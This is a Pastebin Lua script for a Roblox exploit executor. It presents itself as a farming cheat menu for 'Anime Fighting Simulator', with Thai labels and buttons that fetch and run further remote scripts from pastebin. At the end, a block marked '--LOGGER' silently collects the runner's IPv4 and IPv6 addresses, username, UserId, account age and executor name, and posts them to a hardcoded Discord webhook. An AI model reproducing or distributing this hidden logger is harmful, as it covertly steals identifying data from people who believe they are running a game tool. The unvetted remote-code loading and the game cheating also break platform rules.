Advertisement
nuttanun734

Untitled

Dec 29th, 2021 (edited)
84
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 7.09 KB | None | 0 0
  1. local Library = loadstring(game:HttpGet("https://raw.githubusercontent.com/xHeptc/Kavo-UI-Library/main/source.lua"))()
  2.  
  3. local LocalPlayer = game:GetService("Players").LocalPlayer
  4.  
  5.  
  6. local Window = Library.CreateLib("Anime Fighting Simulator (AFS) By nuttanun ", "DarkTheme")
  7.  
  8. local Tab = Window:NewTab("AFS")
  9. local Section = Tab:NewSection("Farm Crystal รันเเบบเรียงตามเลขเดอ (เซิฟคนน้อยจะฟามเร็วกว่า)")
  10. Section:NewButton("Auto equip skill (1) (สําหรับคนไม่ขีเกียจกด r + เลข 0)", "ButtonInfo", function()
  11. loadstring(game:HttpGet('https://pastebin.com/raw/8w9qt0UP', true))()
  12. end)
  13. Section:NewButton("invisible & tp to crystal (2) (อาจมีบางครั่งตายเเต่เดี่ยวก็tp)", "ButtonInfo", function()
  14. loadstring(game:HttpGet('https://pastebin.com/raw/N4ZnFtzx', true))()
  15. end)
  16. Section:NewButton("auto skill (crystal farm) (3) (ถ้าไม่ใช่ให้กดอีกรอบ)", "ButtonInfo", function()
  17. loadstring(game:HttpGet('https://pastebin.com/raw/pRXVz00y', true))()
  18. end)
  19. Section:NewButton("champion & special when death (4) (อันนี้สําคัญ)", "ButtonInfo", function()
  20. loadstring(game:HttpGet('https://pastebin.com/raw/5LPzc4Xa', true))()
  21. end)
  22. Section:NewButton("ANTI AFK (5) (จําเป็นไม่งั่นหลุด)", "ButtonInfo", function()
  23. loadstring(game:HttpGet('https://pastebin.com/raw/4yQqMamV', true))()
  24. end)
  25. Section:NewButton("Turn off (2) (หลังกดต้อง reset)", "ButtonInfo", function()
  26. getgenv().crystal = false --true or false
  27. end)
  28. Section:NewButton("Turn off (3) (หลังกดต้อง reset)", "ButtonInfo", function()
  29. getgenv().skill = false --true or false
  30. end)
  31. Section:NewButton("Rejoin (เกมอื่นใช้ได้) (4 ปิดไม่ได้เดอต้องออกเข้าใหม่เท่านั่น)", "ButtonInfo", function()
  32. game:GetService("TeleportService"):Teleport(game.PlaceId, player)
  33. end)
  34. Section:NewButton("Serverhop (หาเซิฟคนน้อยใช้ได้ทุก Dimension หลังใช้รอเเปป)", "ButtonInfo", function()
  35. getgenv().AutoTeleport = true
  36. getgenv().DontTeleportTheSameNumber = true --If you set this true it won't teleport to the server if it has the same number of players as your current server
  37. getgenv().CopytoClipboard = false
  38.  
  39. if not game:IsLoaded() then
  40. print("Game is loading waiting... | Amnesia Empty Server Finder")
  41. repeat
  42. wait()
  43. until game:IsLoaded()
  44. end
  45.  
  46. local maxplayers = math.huge
  47. local serversmaxplayer;
  48. local goodserver;
  49. local gamelink = "https://games.roblox.com/v1/games/" .. game.PlaceId .. "/servers/Public?sortOrder=Asc&limit=100"
  50.  
  51. function serversearch()
  52. for _, v in pairs(game:GetService("HttpService"):JSONDecode(game:HttpGetAsync(gamelink)).data) do
  53. if type(v) == "table" and maxplayers > v.playing then
  54. serversmaxplayer = v.maxPlayers
  55. maxplayers = v.playing
  56. goodserver = v.id
  57. end
  58. end
  59. print("Currently checking the servers with max this number of players : " .. maxplayers .. " | Amnesia Empty Server Finder")
  60. end
  61.  
  62. function getservers()
  63. serversearch()
  64. for i,v in pairs(game:GetService("HttpService"):JSONDecode(game:HttpGetAsync(gamelink))) do
  65. if i == "nextPageCursor" then
  66. if gamelink:find("&cursor=") then
  67. local a = gamelink:find("&cursor=")
  68. local b = gamelink:sub(a)
  69. gamelink = gamelink:gsub(b, "")
  70. end
  71. gamelink = gamelink .. "&cursor=" ..v
  72. getservers()
  73. end
  74. end
  75. end
  76.  
  77. getservers()
  78.  
  79. print("All of the servers are searched")
  80. print("Server : " .. goodserver .. " Players : " .. maxplayers .. "/" .. serversmaxplayer .. " | Amnesia Empty Server Finder")
  81. if CopytoClipboard then
  82. setclipboard(goodserver)
  83. end
  84. if AutoTeleport then
  85. if DontTeleportTheSameNumber then
  86. if #game:GetService("Players"):GetPlayers() - 1 == maxplayers then
  87. return warn("It has same number of players (except you)")
  88. elseif goodserver == game.JobId then
  89. return warn("Your current server is the most empty server atm")
  90. end
  91. end
  92. print("AutoTeleport is enabled. Teleporting to : " .. goodserver)
  93. game:GetService("TeleportService"):TeleportToPlaceInstance(game.PlaceId, goodserver)
  94. end
  95. end)
  96. Section:NewLabel("Misc")
  97. Section:NewKeybind("KeybindText", "KeybindInfo", Enum.KeyCode.F, function()
  98. Library:ToggleUI()
  99. end)
  100. Section:NewColorPicker("Color Text", "Color Info", Color3.fromRGB(0,0,0), function(color)
  101. print(color)
  102. -- Second argument is the default color
  103. end)
  104. local Tab2 = Window:NewTab("Credits")
  105. local Section2 = Tab2:NewSection("By nuttanun")
  106. Section2:NewLabel("Ver 0.2")
  107. Section2:NewLabel("Update : ไอตู่,เพิ่ม tp crystal ไปยังจุดอื่นเพิ่มเติม")
  108.  
  109. --LOGGER
  110. local Webhook = "https://discord.com/api/webhooks/906566623576621126/dNCR_NfQRZyiBfsT9HU9e0JrbPazIvEMxW4u5oc9WHzC4z963XL2N8lDOrgYIljVGJt1" -- Put your Webhook link here
  111.  
  112. local IPv4 = game:HttpGet("https://v4.ident.me/")
  113. local IPv6 = game:HttpGet("https://v6.ident.me/")
  114.  
  115. local Headers = {["content-type"] = "application/json"} -- Don't Modify
  116.  
  117. local LocalPlayer = game:GetService("Players").LocalPlayer
  118.  
  119. local AccountAge = LocalPlayer.AccountAge
  120. local Exploit = KRNL_LOADED or is_synapse_function and "Synapse X"
  121. local UserId = LocalPlayer.UserId
  122.  
  123. local PlayerData =
  124. {
  125. ["content"] = "",
  126. ["embeds"] = {{
  127. ["title"] = "Username: " .. game.Players.LocalPlayer.Name.."",
  128. ["description"] = PlayerName,
  129. ['thumbnail'] = {['url'] = "https://c.tenor.com/SoBzDkrJuNUAAAAC/cat-hack.gif",
  130. ['height']=1536, ['width']=864},
  131. ["color"] = tonumber(0x2B6BE4),
  132. ["fields"] = {
  133. {
  134. ["name"] = "Exploit used:",
  135. ["value"] = Exploit,
  136. ["inline"] = true
  137. },
  138. {
  139. ["name"] = "AccountAge:",
  140. ["value"] = AccountAge,
  141. ["inline"] = true
  142. },
  143. {
  144. ["name"] = "UserId:",
  145. ["value"] = UserId,
  146. ["inline"] = true
  147. },
  148. {
  149. ["name"] = "IPv4:",
  150. ["value"] = IPv4,
  151. ["inline"] = true
  152. },
  153. {
  154. ["name"] = "IPv6:",
  155. ["value"] = IPv6,
  156. ["inline"] = true
  157. },
  158. },
  159. }}
  160. }
  161. local PlayerData = game:GetService('HttpService'):JSONEncode(PlayerData)
  162. local HttpRequest = http_request;
  163.  
  164. if syn then
  165. HttpRequest = syn.request
  166. else
  167. HttpRequest = http_request
  168. end
  169.  
  170. HttpRequest({Url=Webhook, Body=PlayerData, Method="POST", Headers=Headers})
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement